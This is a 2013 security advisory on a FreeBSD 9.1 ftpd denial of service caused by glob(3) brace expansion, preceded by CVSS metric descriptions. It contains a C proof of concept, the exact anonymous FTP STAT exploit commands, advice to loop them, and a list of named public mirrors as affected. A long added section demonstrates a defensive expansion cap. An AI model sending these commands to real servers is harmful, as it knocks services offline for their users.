Attack Vector (AV): Network
The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed "remotely exploitable" and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity (AC): Low
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required (PR): None
The attacker is unauthenticated prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.
User Interaction (UI): None
The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system; a locally authenticated attacker executes code to elevate privileges.
Scope (S): Unchanged
An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality (C): None
There is no impact on the confidentiality of the system; the attacker does not gain the ability to read any data.
Integrity (I): None
There is no impact on the integrity of the system; the attacker does not gain the ability to modify any files or information on the target system.
Availability (A): High
There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.
FreeBSD 9.1 ftpd Remote Denial of Service
Maksymilian Arciemowicz
http://cxsecurity.org/
http://cxsec.org/
Public Date: 01.02.2013
URL: http://cxsecurity.com/issue/WLB-2013020003
Affected servers:
- ftp.uk.freebsd.org,
- ftp.ua.freebsd.org,
- ftp5.freebsd.org,
- ftp5.us.freebsd.org,
- ftp10.freebsd.org,
- ftp3.uk.freebsd.org,
- ftp7.ua.freebsd.org,
- ftp2.se.freebsd.org,
- ftp2.za.FreeBSD.org,
- ftp2.ru.freebsd.org,
- ftp2.pl.freebsd.org
and more...
--- 1. Description ---
I decided to check BSD ftpd servers once again for wildcard handling. An old bug in libc (CVE-2011-0418) still allows a denial of service against ftpd in the latest FreeBSD version.
An attacker who can connect anonymously to the FTP server can cause CPU resource exhaustion. Logging in with 'USER anonymous' / 'PASS anonymous' and sending a 'STAT' command with a specially crafted wildcard argument is enough to create an ftpd process running at 100% CPU.
Proof of Concept (PoC):
Compile and run the program below against NetBSD's libc and against FreeBSD's libc and compare the behaviour.
--- PoC ---
#include <stdio.h>
#include <string.h>
#include <glob.h>

int main(void)
{
	glob_t globbuf;
	/* A long run of {a,b} groups: every group doubles the number of
	 * candidate expansions glob(3) has to walk through. */
	char stringa[]="{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}";

	/* Same flags FreeBSD's ftpd uses, with an explicit GLOB_LIMIT bound
	 * in gl_matchc so the limit is well defined. */
	memset(&globbuf, 0, sizeof(globbuf));
	globbuf.gl_matchc = 16384;
	glob(stringa, GLOB_BRACE|GLOB_NOCHECK|GLOB_TILDE|GLOB_LIMIT, NULL, &globbuf);
	/* On the fixed NetBSD/OpenBSD libc this returns quickly;
	 * on FreeBSD 9.1 it spins at 100% CPU expanding the braces. */
	globfree(&globbuf);
	return 0;
}
--- PoC ---
--- Exploit ---
user anonymous
pass anonymous
stat {a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}
--- /Exploit ---
Result of attack (ps aux; columns: USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND):
ftp 13034 0.0 0.4 10416 1944 ?? R 10:48PM 0:00.96 ftpd: cxsec.org anonymous/anonymous (ftpd)
ftp 13035 0.0 0.4 10416 1944 ?? R 10:48PM 0:00.89 ftpd: cxsec.org anonymous/anonymous (ftpd)
ftp 13036 0.0 0.4 10416 1944 ?? R 10:48PM 0:00.73 ftpd: cxsec.org anonymous/anonymous (ftpd)
ftp 13046 0.0 0.4 10416 1952 ?? R 10:48PM 0:00.41 ftpd: cxsec.org anonymous/anonymous (ftpd)
ftp 13047 0.0 0.4 10416 1960 ?? R 10:48PM 0:00.42 ftpd: cxsec.org anonymous/anonymous (ftpd)
...
root 13219 0.0 0.3 10032 1424 ?? R 10:52PM 0:00.00 /usr/libexec/ftpd -dDA
root 13225 0.0 0.3 10032 1428 ?? R 10:52PM 0:00.00 /usr/libexec/ftpd -dDA
root 13409 0.0 0.3 10032 1404 ?? R 10:53PM 0:00.00 /usr/libexec/ftpd -dDA
root 13410 0.0 0.3 10032 1404 ?? R 10:53PM 0:00.00 /usr/libexec/ftpd -dDA
...
=> Sending:
STAT {a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}
=> Result:
@ps:
ftp 1336 100.0 0.5 10416 2360 ?? R 11:15PM 600:39.95 ftpd: 127.0.0.1: anonymous/[email protected]: \r\n (ftpd)$
@top:
1336 root 1 103 0 10416K 2360K RUN 600:53 100.00% ftpd
A single request has been running for over 600 minutes (~10 h) at 100% CPU. The issue lets an attacker create N such ftpd processes, each at 100% CPU usage.
Just loop (while(1)) sending these commands:
---
user anonymous
pass anonymous
stat {a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}
---
NetBSD and OpenBSD have fixed this issue in glob(3)/libc (2011):
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gen/glob.c.diff?r1=1.24&r2=1.23.10.2
The irony is that FreeBSD's ftpd already uses GLOB_LIMIT:
http://www.freebsd.org/cgi/cvsweb.cgi/src/libexec/ftpd/ftpd.c
---
if (strpbrk(whichf, "~{[*?") != NULL) {
        int flags = GLOB_BRACE|GLOB_NOCHECK|GLOB_TILDE;

        memset(&gl, 0, sizeof(gl));
        gl.gl_matchc = MAXGLOBARGS;
        flags |= GLOB_LIMIT;
        freeglob = 1;
        if (glob(whichf, flags, 0, &gl)) {
---
but GLOB_LIMIT in FreeBSD's libc does not bound the work glob(3) spends on brace expansion, so glob(3) still allows CPU resource exhaustion. ;]
Libc was also vulnerable in Apple and Oracle products; see their advisories:
http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html
http://support.apple.com/kb/HT4723
At this point only FreeBSD and GNU glibc remain affected.
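To make the GLOB_LIMIT point concrete, here is an added example; it is not code from this advisory, from FreeBSD or from NetBSD. It is a toy brace expander modelled on how glob(3) recurses over GLOB_BRACE alternatives, with two bounds a library could enforce: brace_count() computes how many strings a pattern would produce before doing any work, and brace_expand_limited() aborts as soon as the number of brace expansions performed passes a cap. The function names (brace_count, brace_expand_limited, build_pattern, attack_count, attack_expand_limited), the 1024-byte buffer and the 10000-expansion cap are assumptions of this example; only non-nested {x,y,...} groups are handled, which is all the advisory's STAT argument uses.

```c
/* Added illustration (not the advisory's, FreeBSD's or NetBSD's code):
 * a toy brace expander showing why the STAT pattern is expensive and
 * how a cap checked inside the recursion stops the blow-up early.
 * Non-nested {x,y,...} groups only. */
#include <limits.h>
#include <stdio.h>
#include <string.h>

/* Number of strings 'pat' expands to: the product of the alternative
 * counts of its brace groups.  Returns 0 if the product overflows. */
unsigned long long brace_count(const char *pat)
{
    unsigned long long total = 1;
    const char *p = pat;

    while ((p = strchr(p, '{')) != NULL) {
        unsigned long long alts = 1;
        const char *q;

        for (q = p + 1; *q != '\0' && *q != '}'; q++)
            if (*q == ',')
                alts++;
        if (*q != '}')
            break;                      /* unbalanced brace: literal */
        if (total > ULLONG_MAX / alts)
            return 0;
        total *= alts;
        p = q + 1;
    }
    return total;
}

/* Expand the first brace group in 'pat' and recurse on each alternative.
 * Each recursive step is one brace expansion; once *expansions passes
 * 'limit' the whole expansion is abandoned with -1.  Fully expanded
 * strings are counted in *leaves: that is all an output-only limit such
 * as gl_matchc ever sees. */
static int expand(const char *pat, unsigned long limit,
                  unsigned long *expansions, unsigned long *leaves)
{
    const char *lb = strchr(pat, '{');
    const char *rb = lb ? strchr(lb, '}') : NULL;
    const char *alt;
    char buf[1024];                     /* assumed upper bound on pattern size */
    size_t prefix;

    if (lb == NULL || rb == NULL) {
        (*leaves)++;
        return 0;
    }
    prefix = (size_t)(lb - pat);
    for (alt = lb + 1; alt <= rb; ) {
        const char *end = alt;
        size_t alen;

        while (end < rb && *end != ',')
            end++;
        alen = (size_t)(end - alt);
        if (++*expansions > limit)
            return -1;                  /* work bound hit: stop now */
        if (prefix + alen + strlen(rb + 1) + 1 > sizeof buf)
            return -1;                  /* pattern too long for buf */
        memcpy(buf, pat, prefix);
        memcpy(buf + prefix, alt, alen);
        strcpy(buf + prefix + alen, rb + 1);
        if (expand(buf, limit, expansions, leaves) < 0)
            return -1;
        alt = end + 1;
    }
    return 0;
}

/* Number of expanded strings, or -1 if more than 'limit' brace expansions
 * would be needed.  Returns promptly however long the pattern is, because
 * the check runs at every expansion step rather than on the final output. */
long brace_expand_limited(const char *pat, unsigned long limit)
{
    unsigned long expansions = 0, leaves = 0;

    if (expand(pat, limit, &expansions, &leaves) < 0)
        return -1;
    return (long)leaves;
}

/* Build n copies of "{a,b}", the shape of the STAT argument in the advisory. */
int build_pattern(int n, char *out, size_t outsz)
{
    if (n < 0 || (size_t)n * 5 + 1 > outsz)
        return -1;
    out[0] = '\0';
    for (int i = 0; i < n; i++)
        strcat(out, "{a,b}");
    return 0;
}

unsigned long long attack_count(int n)
{
    char pat[512];
    return build_pattern(n, pat, sizeof pat) == 0 ? brace_count(pat) : 0;
}

long attack_expand_limited(int n, unsigned long limit)
{
    char pat[512];
    return build_pattern(n, pat, sizeof pat) == 0
               ? brace_expand_limited(pat, limit) : -1;
}

int main(void)
{
    printf("48 groups expand to %llu strings\n", attack_count(48));
    printf("48 groups, capped at 10000 expansions: %ld (-1 = refused)\n",
           attack_expand_limited(48, 10000));
    printf("8 groups, same cap: %ld strings\n", attack_expand_limited(8, 10000));
    return 0;
}
```

Run as is, it prints 2^48 for a 48-group pattern, refuses that pattern after 10000 expansion steps, and fully expands an 8-group pattern (256 strings). The design point for anyone wiring glob(3) to user input: where a limit is checked matters. A cap on returned matches (ftpd's gl_matchc = MAXGLOBARGS) can only fire once results are being stored, so the expansion work is still done; a cap applied at each brace-expansion step, as in brace_expand_limited(), refuses the pattern before that work happens. A cheap pre-check with brace_count() is enough to reject a request like the one in this advisory outright.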
--- 2. Exploit ---
http://cxsecurity.com/issue/WLB-2013010233
--- 3. Fix ---
Do not use the base-system ftpd on FreeBSD. :) Switching to vsftpd avoids the problem. ;)
Note that the bug is in libc, so until glob(3) is fixed any server that passes user-controlled patterns to glob(3) with GLOB_BRACE is exposed in the same way.
--- 4. References ---
Multiple Vendors libc/glob(3) remote ftpd resource exhaustion
http://cxsecurity.com/issue/WLB-2010100135
http://cxsecurity.com/cveshow/CVE-2010-2632
Multiple FTPD Server GLOB_BRACE|GLOB_LIMIT memory exhaustion
http://cxsecurity.com/issue/WLB-2011050004
http://cxsecurity.com/cveshow/CVE-2011-0418
More CWE-399 resource exhaustion examples:
http://cxsecurity.com/cwe/CWE-399
The regcomp implementation in the GNU C Library allows attackers to cause a denial of service (demonstrated against proftpd)
http://cxsecurity.com/cveshow/CVE-2010-4051
http://cxsecurity.com/cveshow/CVE-2010-4052
http://www.kb.cert.org/vuls/id/912279
--- 5. Contact ---
Maksymilian Arciemowicz
max 4T cxsecurity.com
http://cxsecurity.com/
http://cxsec.org/
This information is provided for TESTING and LEGAL RESEARCH purposes only.